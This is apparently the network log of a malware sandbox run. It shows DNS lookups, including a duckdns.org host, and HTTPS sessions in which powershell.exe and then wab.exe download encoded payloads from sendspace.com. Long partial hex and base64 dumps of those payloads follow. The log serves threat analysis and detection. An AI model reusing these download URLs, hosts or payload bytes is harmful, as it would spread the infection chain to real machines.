                                                                                                      May 23, 2024 21:05:15.812346935 CEST53564201.1.1.1192.168.2.4
                                                                                                      May 23, 2024 21:06:02.417078972 CEST5680353192.168.2.41.1.1.1
                                                                                                      May 23, 2024 21:06:02.518713951 CEST53568031.1.1.1192.168.2.4
                                                                                                      May 23, 2024 21:06:12.519785881 CEST5566253192.168.2.41.1.1.1
                                                                                                      May 23, 2024 21:06:12.656143904 CEST53556621.1.1.1192.168.2.4

                                                                                                      DNS Queries

                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                      May 23, 2024 21:05:14.897078037 CEST192.168.2.41.1.1.10x13d5Standard query (0)www.sendspace.comA (IP address)IN (0x0001)false
                                                                                                      May 23, 2024 21:05:15.713093996 CEST192.168.2.41.1.1.10xf31eStandard query (0)fs13n3.sendspace.comA (IP address)IN (0x0001)false
                                                                                                      May 23, 2024 21:06:02.417078972 CEST192.168.2.41.1.1.10x93f6Standard query (0)fs03n3.sendspace.comA (IP address)IN (0x0001)false
                                                                                                      May 23, 2024 21:06:12.519785881 CEST192.168.2.41.1.1.10x86caStandard query (0)xgmn934.duckdns.orgA (IP address)IN (0x0001)false

                                                                                                      DNS Answers

                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                      May 23, 2024 21:05:14.908605099 CEST1.1.1.1192.168.2.40x13d5No error (0)www.sendspace.com172.67.170.105A (IP address)IN (0x0001)false
                                                                                                      May 23, 2024 21:05:14.908605099 CEST1.1.1.1192.168.2.40x13d5No error (0)www.sendspace.com104.21.28.80A (IP address)IN (0x0001)false
                                                                                                      May 23, 2024 21:05:15.812346935 CEST1.1.1.1192.168.2.40xf31eNo error (0)fs13n3.sendspace.com69.31.136.57A (IP address)IN (0x0001)false
                                                                                                      May 23, 2024 21:06:02.518713951 CEST1.1.1.1192.168.2.40x93f6No error (0)fs03n3.sendspace.com69.31.136.17A (IP address)IN (0x0001)false
                                                                                                      May 23, 2024 21:06:12.656143904 CEST1.1.1.1192.168.2.40x86caNo error (0)xgmn934.duckdns.org12.202.180.134A (IP address)IN (0x0001)false

                                                                                                      HTTP Request Dependency Graph

                                                                                                      • www.sendspace.com
                                                                                                      • fs13n3.sendspace.com
                                                                                                      • fs03n3.sendspace.com

                                                                                                      HTTPS Proxied Packets

                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      0192.168.2.449730172.67.170.1054437488C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-05-23 19:05:15 UTC174OUTGET /pro/dl/5m5a1u HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                      Host: www.sendspace.com
                                                                                                      Connection: Keep-Alive
                                                                                                      2024-05-23 19:05:15 UTC946INHTTP/1.1 301 Moved Permanently
                                                                                                      Date: Thu, 23 May 2024 19:05:15 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Set-Cookie: SID=oavgirgsemrfm0thnp95prtjl7; path=/; domain=.sendspace.com
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                      Pragma: no-cache
                                                                                                      Location: https://fs13n3.sendspace.com/dlpro/3c9fc79de649f1492cc7b06003ebcaeb/664f936b/5m5a1u/Tyvstjlendes.pfb
                                                                                                      Vary: Accept-Encoding
                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BmyFGqR8hmya6NEB0dYKXQ35CmXYNKKqBFp6l%2FwprbxrED420h1ozscH0qVDFhLbsvxC8%2Bb03i0sddiLH5BlLpKgO6C8Xr5Fe4dT%2BTOI7TPXFe60hX4GNTiQpcg0VPP9oGi%2BBA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 88875100484d0f90-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      2024-05-23 19:05:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1192.168.2.44973169.31.136.574437488C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-05-23 19:05:16 UTC235OUTGET /dlpro/3c9fc79de649f1492cc7b06003ebcaeb/664f936b/5m5a1u/Tyvstjlendes.pfb HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                      Host: fs13n3.sendspace.com
                                                                                                      Connection: Keep-Alive
                                                                                                      2024-05-23 19:05:16 UTC501INHTTP/1.1 200 OK
                                                                                                      Server: nginx
                                                                                                      Date: Thu, 23 May 2024 19:05:16 GMT
                                                                                                      Content-Type: application/octet-stream
                                                                                                      Content-Length: 476228
                                                                                                      Last-Modified: Mon, 20 May 2024 13:35:35 GMT
                                                                                                      Connection: close
                                                                                                      Set-Cookie: SID=4uimpn5prnta03tvj9akreb711; path=/; domain=.sendspace.com
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                      Content-Disposition: attachment;filename="Tyvstjlendes.pfb"
                                                                                                      ETag: "664b51a7-74444"
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-05-23 19:05:16 UTC15883INData Raw: 63 51 47 62 36 77 4a 58 65 4c 75 47 59 51 34 41 36 77 4c 43 45 6e 45 42 6d 77 4e 63 4a 41 52 78 41 5a 74 78 41 5a 75 35 72 36 72 44 39 33 45 42 6d 33 45 42 6d 34 48 78 4e 66 65 34 53 48 45 42 6d 33 45 42 6d 34 48 78 6d 6c 31 37 76 33 45 42 6d 33 45 42 6d 33 45 42 6d 33 45 42 6d 37 71 4e 6d 75 7a 31 36 77 49 75 58 75 73 43 32 57 48 72 41 75 35 62 63 51 47 62 4d 63 70 78 41 5a 76 72 41 6b 4c 58 69 52 51 4c 63 51 47 62 63 51 47 62 30 65 4a 78 41 5a 74 78 41 5a 75 44 77 51 54 72 41 6c 6f 74 36 77 4b 78 6d 49 48 35 4f 69 48 4d 42 58 7a 4d 63 51 47 62 36 77 4c 30 4b 6f 74 45 4a 41 52 78 41 5a 74 78 41 5a 75 4a 77 33 45 42 6d 33 45 42 6d 34 48 44 36 77 71 35 41 4f 73 43 44 37 6c 78 41 5a 75 36 57 2f 56 30 44 4f 73 43 37 36 52 78 41 5a 75 42 36 72 51 4d 68 67 2f
                                                                                                      Data Ascii: cQGb6wJXeLuGYQ4A6wLCEnEBmwNcJARxAZtxAZu5r6rD93EBm3EBm4HxNfe4SHEBm3EBm4Hxml17v3EBm3EBm3EBm3EBm7qNmuz16wIuXusC2WHrAu5bcQGbMcpxAZvrAkLXiRQLcQGbcQGb0eJxAZtxAZuDwQTrAlot6wKxmIH5OiHMBXzMcQGb6wL0KotEJARxAZtxAZuJw3EBm3EBm4HD6wq5AOsCD7lxAZu6W/V0DOsC76RxAZuB6rQMhg/
                                                                                                      2024-05-23 19:05:16 UTC16384INData Raw: 73 63 4a 5a 36 46 36 47 6a 75 67 32 42 72 2b 4b 69 53 65 67 51 49 36 50 66 54 31 48 41 6b 58 36 6c 41 6a 62 55 73 48 6e 75 43 6e 32 39 54 42 32 6f 75 33 32 2f 47 4d 5a 46 48 4d 71 35 38 71 4b 72 6e 52 73 58 73 63 6e 50 54 6a 68 38 36 50 52 36 53 4a 7a 4f 7a 74 54 51 54 45 50 39 75 43 57 36 4d 76 66 4f 31 74 55 58 70 6a 65 77 2f 4f 53 6a 74 6a 77 30 53 56 75 74 74 7a 49 32 67 4f 4d 35 79 70 4a 61 4a 47 69 39 5a 4d 77 7a 47 49 6a 7a 6c 72 78 6d 73 69 35 4c 71 4e 6f 6f 4b 78 6c 70 78 56 6c 77 4f 6d 50 58 76 68 62 42 71 53 32 35 6a 66 65 79 61 44 37 58 76 6f 58 74 2b 33 43 78 64 62 7a 50 73 46 5a 69 4f 56 4d 57 4f 42 53 75 76 65 6d 49 4c 31 6a 6b 5a 73 6f 49 37 74 59 71 74 38 61 56 62 4a 67 73 35 30 68 68 41 33 57 70 33 36 44 55 59 66 66 6a 31 6a 6c 38 56 69
                                                                                                      Data Ascii: scJZ6F6Gjug2Br+KiSegQI6PfT1HAkX6lAjbUsHnuCn29TB2ou32/GMZFHMq58qKrnRsXscnPTjh86PR6SJzOztTQTEP9uCW6MvfO1tUXpjew/OSjtjw0SVuttzI2gOM5ypJaJGi9ZMwzGIjzlrxmsi5LqNooKxlpxVlwOmPXvhbBqS25jfeyaD7XvoXt+3CxdbzPsFZiOVMWOBSuvemIL1jkZsoI7tYqt8aVbJgs50hhA3Wp36DUYffj1jl8Vi
                                                                                                      2024-05-23 19:05:16 UTC16384INData Raw: 74 51 7a 74 48 64 45 77 52 59 7a 49 52 66 73 58 6c 35 30 79 71 62 38 4e 65 4a 31 6e 58 31 37 69 32 50 48 45 77 75 59 76 51 72 43 54 63 31 34 6a 70 6a 4f 7a 51 75 5a 50 57 7a 69 31 6f 33 31 44 66 66 39 4c 44 74 56 4c 65 68 41 33 78 66 75 56 2b 48 72 6b 66 49 62 61 41 65 56 5a 42 71 38 46 64 39 6b 53 6f 41 39 76 2b 2b 55 5a 35 6a 46 2b 73 46 75 4a 55 71 43 50 58 2b 6f 4a 39 56 6b 2f 54 70 59 78 33 75 64 48 73 54 6a 68 38 69 61 6f 76 62 64 66 69 67 6e 31 57 54 36 50 62 47 51 30 44 2b 65 78 4f 4f 48 78 5a 79 73 6c 35 56 6b 39 75 77 73 39 72 52 43 37 58 75 64 48 58 62 32 57 35 69 6d 4b 76 31 72 4c 58 75 56 33 37 48 74 4f 35 75 6f 6c 58 4a 4b 6b 46 30 37 47 66 58 33 79 6c 2b 59 63 30 4c 57 6d 78 7a 31 58 5a 52 71 63 79 2b 30 33 34 49 2b 4d 6c 72 66 68 2b 48 50
                                                                                                      Data Ascii: tQztHdEwRYzIRfsXl50yqb8NeJ1nX17i2PHEwuYvQrCTc14jpjOzQuZPWzi1o31Dff9LDtVLehA3xfuV+HrkfIbaAeVZBq8Fd9kSoA9v++UZ5jF+sFuJUqCPX+oJ9Vk/TpYx3udHsTjh8iaovbdfign1WT6PbGQ0D+exOOHxZysl5Vk9uws9rRC7XudHXb2W5imKv1rLXuV37HtO5uolXJKkF07GfX3yl+Yc0LWmxz1XZRqcy+034I+Mlrfh+HP
                                                                                                      2024-05-23 19:05:16 UTC16384INData Raw: 32 4d 4f 52 43 79 4e 46 4e 49 64 58 77 47 4b 6f 71 61 58 74 43 70 34 52 6b 5a 6a 73 79 55 68 79 44 31 58 4a 4c 62 66 32 6c 2b 34 52 50 30 4d 37 4c 78 6e 7a 52 70 76 32 6c 77 78 6f 77 6e 63 37 54 57 70 57 72 76 76 56 64 4e 76 4d 4c 62 77 39 74 51 4e 43 4d 75 33 43 68 6b 32 65 56 72 53 59 70 30 48 51 69 6d 63 39 55 63 56 37 35 71 44 62 61 62 2b 78 6c 34 77 69 41 73 47 45 62 4e 6c 4c 56 58 6e 43 79 74 56 50 76 46 4c 46 2f 57 55 34 72 75 46 5a 50 4f 48 78 57 54 7a 68 38 56 6b 38 34 66 46 5a 50 4f 48 78 57 54 7a 68 38 56 6b 38 34 66 46 61 68 31 75 6f 2b 39 50 51 38 63 4d 36 65 43 46 4c 6c 39 41 48 71 5a 4f 4e 43 4d 32 70 52 44 6d 6f 5a 33 35 6f 51 39 61 6a 6c 4b 62 41 68 6c 4d 4e 61 44 32 34 41 39 2f 38 2f 58 76 46 37 2f 61 57 44 6f 59 71 55 4d 61 37 52 66 47
                                                                                                      Data Ascii: 2MORCyNFNIdXwGKoqaXtCp4RkZjsyUhyD1XJLbf2l+4RP0M7LxnzRpv2lwxownc7TWpWrvvVdNvMLbw9tQNCMu3Chk2eVrSYp0HQimc9UcV75qDbab+xl4wiAsGEbNlLVXnCytVPvFLF/WU4ruFZPOHxWTzh8Vk84fFZPOHxWTzh8Vk84fFah1uo+9PQ8cM6eCFLl9AHqZONCM2pRDmoZ35oQ9ajlKbAhlMNaD24A9/8/XvF7/aWDoYqUMa7RfG
                                                                                                      2024-05-23 19:05:16 UTC16384INData Raw: 43 54 59 34 2b 33 48 4f 32 57 72 38 34 48 55 5a 4a 33 39 37 4f 52 51 68 31 70 7a 68 38 57 63 4a 56 64 31 5a 50 59 6f 71 52 4a 6d 66 31 6b 42 6d 7a 79 65 64 4f 4f 48 77 41 38 53 6b 61 67 70 65 35 69 6e 37 68 70 63 72 58 75 53 33 73 48 79 47 78 65 6b 4e 52 66 4b 69 71 67 64 67 2f 4d 67 7a 66 50 76 63 45 62 4e 4d 4e 6e 30 70 54 57 4a 4d 46 31 6e 57 6e 5a 35 4f 76 69 5a 6d 6a 79 78 46 76 77 2f 68 30 57 68 44 58 75 4f 38 68 71 75 71 35 69 31 2f 45 54 50 6e 58 75 4d 39 39 5a 51 6d 35 6b 35 63 4f 34 58 62 66 53 41 65 50 4f 52 77 46 4d 62 4d 76 43 38 43 30 38 4f 6b 42 2f 77 69 57 59 31 75 58 72 44 42 78 35 78 52 48 45 4b 68 33 44 6b 69 6f 4b 4b 75 47 63 6a 2b 45 54 45 43 75 49 37 34 73 78 48 39 57 47 49 63 35 43 74 58 33 2f 61 46 33 49 41 6e 73 7a 76 2f 59 33 58
                                                                                                      Data Ascii: CTY4+3HO2Wr84HUZJ397ORQh1pzh8WcJVd1ZPYoqRJmf1kBmzyedOOHwA8Skagpe5in7hpcrXuS3sHyGxekNRfKiqgdg/MgzfPvcEbNMNn0pTWJMF1nWnZ5OviZmjyxFvw/h0WhDXuO8hquq5i1/ETPnXuM99ZQm5k5cO4XbfSAePORwFMbMvC8C08OkB/wiWY1uXrDBx5xRHEKh3DkioKKuGcj+ETECuI74sxH9WGIc5CtX3/aF3IAnszv/Y3X
                                                                                                      2024-05-23 19:05:16 UTC16384INData Raw: 35 79 64 52 4f 4f 48 79 4e 71 47 4b 5a 31 72 58 36 2f 65 50 4e 4f 58 78 57 66 73 7a 58 65 4d 35 46 41 49 34 4a 4f 48 78 5a 77 47 71 2f 71 62 41 42 76 7a 44 4f 77 74 59 65 44 63 66 78 31 45 34 34 66 43 4f 39 65 76 6d 56 4b 5a 47 43 31 6f 79 39 72 4e 30 54 48 48 67 77 79 75 73 61 62 35 7a 2f 66 2b 4a 52 44 2b 56 71 46 31 36 4c 6b 45 4e 46 2f 58 31 54 51 49 7a 4f 7a 67 74 4b 35 4c 72 4f 52 49 37 4c 33 2f 31 6c 43 79 7a 50 6f 4d 72 6a 75 39 4e 6c 4f 6e 78 57 68 64 45 48 73 63 36 4e 56 6c 52 50 4f 44 50 72 4c 74 4c 39 34 32 55 36 66 46 61 45 53 79 7a 31 7a 38 49 4a 31 38 6f 53 66 6c 5a 50 6a 61 54 6a 48 72 6d 48 46 6f 55 46 54 39 65 30 2b 35 44 70 53 6e 75 44 32 32 55 36 66 46 59 36 7a 2f 69 50 44 50 39 2f 61 42 49 42 51 61 72 4f 43 34 71 33 65 42 6f 61 30 35
                                                                                                      Data Ascii: 5ydROOHyNqGKZ1rX6/ePNOXxWfszXeM5FAI4JOHxZwGq/qbABvzDOwtYeDcfx1E44fCO9evmVKZGC1oy9rN0THHgwyusab5z/f+JRD+VqF16LkENF/X1TQIzOzgtK5LrORI7L3/1lCyzPoMrju9NlOnxWhdEHsc6NVlRPODPrLtL942U6fFaESyz1z8IJ18oSflZPjaTjHrmHFoUFT9e0+5DpSnuD22U6fFY6z/iPDP9/aBIBQarOC4q3eBoa05
                                                                                                      2024-05-23 19:05:16 UTC16384INData Raw: 6f 2f 56 64 72 67 43 36 6e 7a 68 48 61 4e 32 33 62 2f 58 2b 4d 5a 6b 79 67 69 4c 30 42 56 45 38 34 2f 52 38 75 64 66 6d 4e 7a 6f 30 42 56 45 38 34 2b 49 76 45 38 55 53 64 7a 6f 30 42 56 45 38 34 63 55 30 4a 4e 45 53 55 7a 6f 30 42 56 45 38 34 64 39 6e 6a 73 45 53 68 64 38 59 39 71 63 4a 46 66 6c 5a 50 54 59 6b 77 75 50 36 38 62 67 35 65 2b 5a 30 70 76 61 2b 56 79 75 4c 39 4b 7a 39 71 2f 6c 5a 50 4e 2f 45 6d 6c 7a 74 38 61 71 61 7a 49 48 4a 4c 76 4c 2f 53 6c 2f 39 2f 58 79 6d 37 41 39 64 38 5a 6e 64 6e 6d 4c 69 42 6f 4d 34 4c 2f 45 37 47 2b 2f 31 56 65 37 4b 34 77 73 2f 44 30 4e 65 4d 39 42 31 75 54 4c 6d 58 6e 69 34 41 66 35 46 4d 55 57 72 51 64 72 6c 50 52 79 57 72 77 32 2b 46 75 55 39 65 2b 69 64 59 30 35 79 35 56 33 69 4b 45 4e 4d 77 64 75 43 37 30 2f
                                                                                                      Data Ascii: o/VdrgC6nzhHaN23b/X+MZkygiL0BVE84/R8udfmNzo0BVE84+IvE8USdzo0BVE84cU0JNESUzo0BVE84d9njsEShd8Y9qcJFflZPTYkwuP68bg5e+Z0pva+VyuL9Kz9q/lZPN/Emlzt8aqazIHJLvL/Sl/9/Xym7A9d8ZndnmLiBoM4L/E7G+/1Ve7K4ws/D0NeM9B1uTLmXni4Af5FMUWrQdrlPRyWrw2+FuU9e+idY05y5V3iKENMwduC70/
                                                                                                      2024-05-23 19:05:16 UTC16384INData Raw: 39 2b 69 7a 35 50 73 52 56 43 34 32 31 33 51 55 36 6b 6a 55 4e 51 76 51 4d 69 48 31 73 34 2f 6f 71 63 4e 63 36 4b 4c 65 32 35 55 38 72 36 66 42 39 4d 72 4c 4f 31 30 73 57 2f 39 33 39 75 59 51 62 55 61 37 4f 7a 32 41 63 59 6d 7a 39 6f 65 36 53 49 51 51 5a 70 50 57 77 52 67 62 68 62 70 78 43 66 6a 49 69 36 74 66 4e 2f 63 76 53 63 67 78 31 47 54 5a 57 45 58 46 4c 6a 65 53 6c 66 6e 61 49 34 6d 6a 6c 63 5a 58 78 48 6e 66 53 55 6b 4d 4b 52 4b 49 52 58 76 6d 65 45 4c 6b 4a 52 6e 30 72 47 48 42 41 2f 30 58 57 54 7a 68 38 56 6b 38 34 66 46 5a 50 4f 48 78 57 54 7a 68 38 56 6b 38 34 66 46 5a 50 4f 48 78 57 54 38 66 39 32 6c 76 4b 2f 4f 33 4c 75 38 70 68 6c 73 33 39 51 73 6a 58 51 51 4f 59 37 4d 30 48 39 6f 32 6e 76 6e 57 35 6a 55 46 4c 6c 4f 2f 58 6a 6d 5a 64 37 52
                                                                                                      Data Ascii: 9+iz5PsRVC4213QU6kjUNQvQMiH1s4/oqcNc6KLe25U8r6fB9MrLO10sW/939uYQbUa7Oz2AcYmz9oe6SIQQZpPWwRgbhbpxCfjIi6tfN/cvScgx1GTZWEXFLjeSlfnaI4mjlcZXxHnfSUkMKRKIRXvmeELkJRn0rGHBA/0XWTzh8Vk84fFZPOHxWTzh8Vk84fFZPOHxWT8f92lvK/O3Lu8phls39QsjXQQOY7M0H9o2nvnW5jUFLlO/XjmZd7R
                                                                                                      2024-05-23 19:05:17 UTC16384INData Raw: 39 4a 6c 52 50 4f 4c 74 56 62 70 75 62 5a 53 6e 50 75 79 70 35 75 55 39 4e 79 74 55 79 31 33 79 59 4d 56 48 4c 75 55 2b 50 34 30 50 5a 30 71 44 50 76 32 66 71 6d 53 66 58 6a 43 53 43 57 30 36 35 6c 30 36 78 4e 58 33 53 71 50 39 2f 42 52 71 57 6a 74 64 38 58 33 7a 52 4c 62 6c 2f 6b 54 30 4b 4d 74 64 38 4d 4f 55 34 44 38 36 2f 5a 62 6a 2b 33 75 69 4b 63 76 58 72 6e 44 6c 38 56 76 44 6a 38 4a 50 6c 75 59 73 66 52 66 4f 65 30 71 6d 35 75 38 4c 6d 64 34 48 58 75 42 70 4d 43 41 70 65 2b 59 37 4c 2b 33 32 74 78 49 57 76 56 30 38 34 47 6d 2b 4f 2f 33 38 39 62 71 74 78 31 33 77 70 51 39 4e 30 75 55 2b 63 4a 76 79 2b 31 33 78 64 6f 50 64 62 75 51 45 71 65 38 35 38 56 6b 43 31 74 57 53 77 78 78 72 54 6e 72 48 42 70 6b 34 34 66 4f 6d 79 34 73 31 39 64 2b 76 39 6f 63
                                                                                                      Data Ascii: 9JlRPOLtVbpubZSnPuyp5uU9NytUy13yYMVHLuU+P40PZ0qDPv2fqmSfXjCSCW065l06xNX3SqP9/BRqWjtd8X3zRLbl/kT0KMtd8MOU4D86/Zbj+3uiKcvXrnDl8VvDj8JPluYsfRfOe0qm5u8Lmd4HXuBpMCApe+Y7L+32txIWvV084Gm+O/389bqtx13wpQ9N0uU+cJvy+13xdoPdbuQEqe858VkC1tWSwxxrTnrHBpk44fOmy4s19d+v9oc
                                                                                                      2024-05-23 19:05:17 UTC16384INData Raw: 50 66 46 35 50 4f 50 58 6a 47 7a 70 38 56 73 62 2b 63 31 65 4c 63 6e 78 57 54 7a 68 38 56 6b 38 34 66 46 5a 50 4f 48 78 57 54 7a 68 38 56 6b 38 34 66 46 5a 50 4f 48 79 71 4c 6d 5a 51 34 2f 36 45 4b 6e 32 6c 4a 68 37 67 42 66 4c 6e 44 59 56 59 4b 6c 6c 50 35 71 78 57 54 7a 68 38 56 6b 38 34 66 46 5a 50 4f 48 78 57 54 7a 68 38 56 6b 38 34 66 46 5a 50 4f 48 78 57 6f 48 51 68 6e 4a 79 35 39 2b 4d 62 4f 6e 78 57 67 34 48 49 48 54 37 49 31 4b 32 65 6a 49 39 4a 4a 62 64 41 44 6c 6c 73 39 77 4d 32 72 57 59 43 7a 51 62 6e 35 77 54 63 79 58 4d 79 45 2b 75 5a 6c 39 48 77 65 34 4e 76 52 35 43 73 70 59 6f 39 47 33 53 36 4f 72 68 4c 35 41 4f 67 31 4c 53 54 4a 61 68 55 78 73 43 7a 39 6f 63 64 30 75 47 53 42 63 50 51 65 2f 33 2f 6c 4d 30 4a 4f 33 77 42 38 50 66 50 4d 6d
                                                                                                      Data Ascii: PfF5POPXjGzp8Vsb+c1eLcnxWTzh8Vk84fFZPOHxWTzh8Vk84fFZPOHyqLmZQ4/6EKn2lJh7gBfLnDYVYKllP5qxWTzh8Vk84fFZPOHxWTzh8Vk84fFZPOHxWoHQhnJy59+MbOnxWg4HIHT7I1K2ejI9JJbdADlls9wM2rWYCzQbn5wTcyXMyE+uZl9Hwe4NvR5CspYo9G3S6OrhL5AOg1LSTJahUxsCz9ocd0uGSBcPQe/3/lM0JO3wB8PfPMm


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2192.168.2.449738172.67.170.1054432688C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-05-23 19:06:02 UTC175OUTGET /pro/dl/wyg3h5 HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                      Host: www.sendspace.com
                                                                                                      Cache-Control: no-cache
                                                                                                      2024-05-23 19:06:02 UTC948INHTTP/1.1 301 Moved Permanently
                                                                                                      Date: Thu, 23 May 2024 19:06:02 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Set-Cookie: SID=mqp5phs8i4ibarpn7np6voj641; path=/; domain=.sendspace.com
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                      Pragma: no-cache
                                                                                                      Location: https://fs03n3.sendspace.com/dlpro/6e53a87522bbc42d52425dcdcc286e6c/664f939a/wyg3h5/SKAsvg71.bin
                                                                                                      Vary: Accept-Encoding
                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C8qQCONS3v%2BdsXxrG5JdQfMzJg8%2FIHZtflTdMTLSZL3fNRtDURthotTDB8%2FK00b5oOzCHsFpimtU%2Bm81WDgFjddmqZf%2BfJhG%2Fqgkg5OaS%2FgSVCvHVErUv%2BwZmZDlYUzW0TUpUQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 888752235ea54334-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      2024-05-23 19:06:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      3192.168.2.44973969.31.136.174432688C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-05-23 19:06:04 UTC296OUTGET /dlpro/6e53a87522bbc42d52425dcdcc286e6c/664f939a/wyg3h5/SKAsvg71.bin HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                      Cache-Control: no-cache
                                                                                                      Host: fs03n3.sendspace.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cookie: SID=mqp5phs8i4ibarpn7np6voj641
                                                                                                      2024-05-23 19:06:04 UTC420INHTTP/1.1 200 OK
                                                                                                      Server: nginx
                                                                                                      Date: Thu, 23 May 2024 19:06:04 GMT
                                                                                                      Content-Type: application/octet-stream
                                                                                                      Content-Length: 34368
                                                                                                      Last-Modified: Mon, 20 May 2024 13:31:42 GMT
                                                                                                      Connection: close
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                      Content-Disposition: attachment;filename="SKAsvg71.bin"
                                                                                                      ETag: "664b50be-8640"
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-05-23 19:06:04 UTC15964INData Raw: 91 89 53 09 8e 60 ce b0 3c f3 fb d3 6c 46 c6 e8 76 24 9d 94 c0 93 03 f6 af 72 ef de 16 b3 c2 99 b6 80 a4 57 1a 2e db bd 9f 9e 48 8b a1 27 3c 5d 46 5b 34 91 62 d3 f0 48 a1 71 b5 3b a6 f4 6a e3 f7 2c 61 00 7e 32 ea a7 90 16 5d 3f 49 3c 55 43 68 7b fc 78 3a 7e c0 d1 11 3c 4e 97 b3 96 f6 21 53 f1 6e 19 25 d7 ca f2 32 56 2f 23 4a 93 bb fa 07 13 4e 38 16 94 85 a9 f4 0d f0 c1 8c f5 a5 21 00 ba a4 f5 e5 b5 77 2f b3 48 31 62 d1 dc 34 eb 08 59 12 89 40 51 af 6e 62 9f 02 62 68 58 3d 2b 23 4a a3 46 2c 7a 81 8d 9d c7 a8 50 eb 48 56 76 ff 9f 24 97 1d 71 3d 0d 71 85 c3 a1 57 d1 cf 10 64 86 c8 b7 5d 7d 5e 4e d9 04 fc 88 5c cc 24 d1 56 b3 26 23 1d b2 5d 5c b4 4d c7 9a 25 2f 75 e3 96 6b 5b 6b 48 e8 49 61 41 46 35 5d 88 9d 85 42 c2 c5 8d f6 fb 10 ec d1 b8 39 ca 5e 95 0c bc
                                                                                                      Data Ascii: S`<lFv$rW.H'<]F[4bHq;j,a~2]?I<UCh{x:~<N!Sn%2V/#JN8!w/H1b4Y@QnbbhX=+#JF,zPHVv$q=qWd]}^N\$V&#]\M%/uk[kHIaAF5]B9^
                                                                                                      2024-05-23 19:06:04 UTC16384INData Raw: 3b cf 85 cd d5 0f f4 af ca 58 cc b0 24 ef f4 5c c5 e9 e6 a3 af 80 67 13 6c 6f 63 be 25 d4 89 56 89 da a7 7f 6c fd 15 16 48 19 98 47 d7 82 17 d8 97 6d 3d 0c db d4 e8 99 e7 13 73 bd d2 0c e9 c2 43 25 9c 90 24 4f 56 96 95 1c 18 33 53 e7 13 81 d7 99 ed 14 a5 ad 32 62 dd 61 bd d5 89 b4 42 23 6c 7e 3d 6b b6 91 ab a4 63 a3 45 8a 1a 53 8f 72 6f 68 64 c2 4e 3f fa 1f 1e ac d9 85 7a 42 39 c8 17 54 11 a5 fe 90 b8 25 e1 5a dc 88 e2 63 65 dc 4a 20 6b cf 3f 90 52 4c 1f 8d 0c 68 88 76 d6 42 4a 69 36 60 72 39 d9 2a 89 79 44 e8 ac 19 a1 2c 57 5b 53 5c af 47 63 d8 78 b4 39 cf c2 cb 23 4c c6 32 62 72 13 fb 04 13 c3 4c 97 95 2e 0a b3 dc 72 d3 11 8a e0 8d fb f4 bf b5 70 08 43 23 8e 8a 43 4e eb f8 6f 21 e9 1e 32 fa f1 a6 bd 83 10 4f 44 56 1a 62 df 6b 87 9c a8 35 66 63 d5 6e 02
                                                                                                      Data Ascii: ;X$\gloc%VlHGm=sC%$OV3S2baB#l~=kcESrohdN?zB9T%ZceJ k?RLhvBJi6`r9*yD,W[S\Gcx9#L2brL.rpC#CNo!2ODVbk5fcn
